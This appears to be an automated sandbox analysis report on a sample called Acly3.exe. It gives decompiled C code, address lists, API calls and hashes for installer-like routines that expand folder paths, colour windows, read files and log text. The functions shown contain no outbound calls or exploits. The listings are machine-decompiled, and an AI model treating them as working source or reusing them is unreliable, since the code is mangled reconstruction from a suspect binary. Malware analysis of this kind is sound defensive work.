                                                                            • API String ID: 2171350718-461813615
                                                                            • Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                            • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                                                            • Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                            • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040657A, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 72%
                                                                            			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x433edc - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x434f38 + _t44 * 2;
				_t45 = 0x432ea0;
				_t108 = 0x432ea0;
				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E0040653D(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x432ea0;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x436000;
								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
							} else {
								E00406484(_t108,  *0x434f08);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004067C4(_t108);
							}
							goto L38;
						}
						if( *0x434f84 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x434f04;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E0040657A(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                                                                            0x0040657a
                                                                            0x0040657a
                                                                            0x0040657a
                                                                            0x00406580
                                                                            0x00406585
                                                                            0x00406596
                                                                            0x00406596
                                                                            0x0040659e
                                                                            0x0040659f
                                                                            0x004065a0
                                                                            0x004065a1
                                                                            0x004065a4
                                                                            0x004065ac
                                                                            0x004065ae
                                                                            0x004065bf
                                                                            0x004065c2
                                                                            0x004065c2
                                                                            0x004065c6
                                                                            0x004065cc
                                                                            0x004065cf
                                                                            0x004067aa
                                                                            0x004067aa
                                                                            0x004067b5
                                                                            0x004067c1
                                                                            0x004067c1
                                                                            0x00000000
                                                                            0x004065d5
                                                                            0x004065da
                                                                            0x004065ef
                                                                            0x004065f0
                                                                            0x004065f6
                                                                            0x00406788
                                                                            0x00406796
                                                                            0x00406799
                                                                            0x00406799
                                                                            0x0040678a
                                                                            0x0040678d
                                                                            0x00406790
                                                                            0x00406792
                                                                            0x00406792
                                                                            0x0040679b
                                                                            0x0040679b
                                                                            0x004067a1
                                                                            0x004067a4
                                                                            0x004065d7
                                                                            0x00000000
                                                                            0x004065d7
                                                                            0x00000000
                                                                            0x004067a4
                                                                            0x004065fc
                                                                            0x004065ff
                                                                            0x0040660e
                                                                            0x00406615
                                                                            0x00406621
                                                                            0x00406624
                                                                            0x00406627
                                                                            0x00406628
                                                                            0x0040662d
                                                                            0x00406633
                                                                            0x00406636
                                                                            0x00406639
                                                                            0x0040672c
                                                                            0x00406731
                                                                            0x00406764
                                                                            0x00406769
                                                                            0x0040676e
                                                                            0x00406773
                                                                            0x00406773
                                                                            0x00406778
                                                                            0x0040677e
                                                                            0x00406781
                                                                            0x00000000
                                                                            0x00406781
                                                                            0x00406733
                                                                            0x00406736
                                                                            0x00406739
                                                                            0x0040674e
                                                                            0x00406755
                                                                            0x0040673b
                                                                            0x00406742
                                                                            0x00406742
                                                                            0x0040675d
                                                                            0x00406760
                                                                            0x00406724
                                                                            0x00406725
                                                                            0x00406725
                                                                            0x00000000
                                                                            0x00406760
                                                                            0x00406646
                                                                            0x0040664a
                                                                            0x0040664a
                                                                            0x0040664b
                                                                            0x0040664d
                                                                            0x0040668a
                                                                            0x0040668d
                                                                            0x0040669d
                                                                            0x004066a0
                                                                            0x004066a8
                                                                            0x004066ae
                                                                            0x004066ae
                                                                            0x00406709
                                                                            0x00406709
                                                                            0x0040670b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004066b2
                                                                            0x004066b7
                                                                            0x004066b8
                                                                            0x004066ba
                                                                            0x004066d1
                                                                            0x004066df
                                                                            0x004066e5
                                                                            0x004066e7
                                                                            0x00406705
                                                                            0x00406705
                                                                            0x00406705
                                                                            0x00000000
                                                                            0x00406705
                                                                            0x004066ed
                                                                            0x004066f6
                                                                            0x004066f9
                                                                            0x004066ff
                                                                            0x00406703
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406703
                                                                            0x004066cb
                                                                            0x004066cd
                                                                            0x004066cf
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004066cf
                                                                            0x00000000
                                                                            0x00406709
                                                                            0x00406695
                                                                            0x00000000
                                                                            0x0040664f
                                                                            0x0040666d
                                                                            0x00406676
                                                                            0x00406713
                                                                            0x00406717
                                                                            0x0040671f
                                                                            0x0040671f
                                                                            0x00000000
                                                                            0x00406717
                                                                            0x00406680
                                                                            0x0040670d
                                                                            0x00406711
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406711
                                                                            0x0040664d
                                                                            0x00000000
                                                                            0x004065da

                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\Acly3.exe,00000400), ref: 00406695
                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\Acly3.exe,00000400,00000000,0042C248,?,004055D6,0042C248,00000000,00000000,?,74EC110C), ref: 004066A8
                                                                            • lstrcatW.KERNEL32 ref: 0040671F
                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\Acly3.exe,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\Acly3.exe$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                            • API String ID: 4260037668-3803493691
                                                                            • Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                            • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                                                            • Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                            • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00404500, Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                                            0x00404512
                                                                            0x004045c8
                                                                            0x00000000
                                                                            0x004045c8
                                                                            0x00404523
                                                                            0x00404527
                                                                            0x00000000
                                                                            0x00404541
                                                                            0x00404541
                                                                            0x0040454a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040454c
                                                                            0x00404558
                                                                            0x0040455b
                                                                            0x0040455b
                                                                            0x00404561
                                                                            0x00404567
                                                                            0x00404567
                                                                            0x00404573
                                                                            0x00404579
                                                                            0x00404580
                                                                            0x00404583
                                                                            0x00404586
                                                                            0x00404588
                                                                            0x00404588
                                                                            0x00404590
                                                                            0x00404596
                                                                            0x00404596
                                                                            0x004045a0
                                                                            0x004045a5
                                                                            0x004045a8
                                                                            0x004045ad
                                                                            0x004045b0
                                                                            0x004045b0
                                                                            0x004045c0
                                                                            0x004045c0
                                                                            0x00000000
                                                                            0x004045c3

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                            • String ID:
                                                                            • API String ID: 2320649405-0
                                                                            • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                            • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                                                            • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                            • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004026EC, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 87%
                                                                            			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                                            0x004026ec
                                                                            0x004026ee
                                                                            0x004026f1
                                                                            0x004026f3
                                                                            0x004026f6
                                                                            0x004026fb
                                                                            0x004026ff
                                                                            0x00402702
                                                                            0x00402705
                                                                            0x00402c2a
                                                                            0x00402c2d
                                                                            0x0040270b
                                                                            0x0040270b
                                                                            0x00402712
                                                                            0x00402714
                                                                            0x00402714
                                                                            0x0040271a
                                                                            0x0040287e
                                                                            0x0040287e
                                                                            0x00402881
                                                                            0x00402886
                                                                            0x004015b6
                                                                            0x0040292e
                                                                            0x0040292e
                                                                            0x00000000
                                                                            0x00402720
                                                                            0x00402721
                                                                            0x0040272c
                                                                            0x0040272f
                                                                            0x0040273b
                                                                            0x0040273f
                                                                            0x004027d7
                                                                            0x004027ef
                                                                            0x004027ff
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402745
                                                                            0x00402745
                                                                            0x00402748
                                                                            0x00402749
                                                                            0x0040274c
                                                                            0x00402751
                                                                            0x00402758
                                                                            0x00402760
                                                                            0x00000000
                                                                            0x00402766
                                                                            0x00402766
                                                                            0x0040276b
                                                                            0x00000000
                                                                            0x00402771
                                                                            0x00402771
                                                                            0x00402779
                                                                            0x0040277c
                                                                            0x0040277f
                                                                            0x0040283a
                                                                            0x00402841
                                                                            0x00402785
                                                                            0x0040278b
                                                                            0x00402797
                                                                            0x00402801
                                                                            0x00402801
                                                                            0x00402799
                                                                            0x00402799
                                                                            0x0040279c
                                                                            0x0040279e
                                                                            0x0040279e
                                                                            0x0040279e
                                                                            0x004027a1
                                                                            0x004027a6
                                                                            0x004027a9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004027ab
                                                                            0x004027ae
                                                                            0x004027bc
                                                                            0x004027c2
                                                                            0x004027d0
                                                                            0x00000000
                                                                            0x004027d2
                                                                            0x00000000
                                                                            0x004027d2
                                                                            0x00000000
                                                                            0x004027d0
                                                                            0x0040279e
                                                                            0x00402804
                                                                            0x00402807
                                                                            0x00000000
                                                                            0x00402809
                                                                            0x0040280e
                                                                            0x0040284f
                                                                            0x00402871
                                                                            0x00402878
                                                                            0x0040285d
                                                                            0x0040285d
                                                                            0x00402860
                                                                            0x00402863
                                                                            0x00402866
                                                                            0x00402866
                                                                            0x00000000
                                                                            0x00402817
                                                                            0x00402817
                                                                            0x0040281a
                                                                            0x0040281d
                                                                            0x00402823
                                                                            0x00402827
                                                                            0x0040282a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040282a
                                                                            0x0040280e
                                                                            0x00402807
                                                                            0x0040277f
                                                                            0x0040276b
                                                                            0x00402760
                                                                            0x00000000
                                                                            0x0040282c
                                                                            0x0040282c
                                                                            0x0040282f
                                                                            0x00402838
                                                                            0x00000000
                                                                            0x0040272f
                                                                            0x0040271a
                                                                            0x00402c33
                                                                            0x00402c39

                                                                            APIs
                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                              • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                            • String ID: 9
                                                                            • API String ID: 163830602-2366072709
                                                                            • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                            • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                                                            • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                            • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040559F, Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E0040559F(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x433ee4;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x434fb4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
					}
					_t27 = lstrlenW(0x42c248);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x433ec8, 0x42c248);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42c248;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x42c248[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x42c248, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                                            0x004055a5
                                                                            0x004055af
                                                                            0x004055b4
                                                                            0x004055ba
                                                                            0x004055c5
                                                                            0x004055c8
                                                                            0x004055cb
                                                                            0x004055d1
                                                                            0x004055d1
                                                                            0x004055d7
                                                                            0x004055df
                                                                            0x004055e2
                                                                            0x004055ff
                                                                            0x00405603
                                                                            0x0040560c
                                                                            0x0040560c
                                                                            0x00405616
                                                                            0x0040561f
                                                                            0x0040562b
                                                                            0x00405632
                                                                            0x00405636
                                                                            0x00405639
                                                                            0x0040564c
                                                                            0x0040565a
                                                                            0x0040565a
                                                                            0x0040565e
                                                                            0x00405660
                                                                            0x00405663
                                                                            0x00000000
                                                                            0x00405663
                                                                            0x004055e4
                                                                            0x004055ec
                                                                            0x004055f4
                                                                            0x004055fa
                                                                            0x00000000
                                                                            0x004055fa
                                                                            0x004055f4
                                                                            0x004055e2
                                                                            0x0040566f

                                                                            APIs
                                                                            • lstrlenW.KERNEL32(0042C248,00000000,?,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                            • lstrlenW.KERNEL32(00403418,0042C248,00000000,?,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                            • lstrcatW.KERNEL32 ref: 004055FA
                                                                            • SetWindowTextW.USER32 ref: 0040560C
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                              • Part of subcall function 0040657A: lstrcatW.KERNEL32 ref: 0040671F
                                                                              • Part of subcall function 0040657A: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\Acly3.exe,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
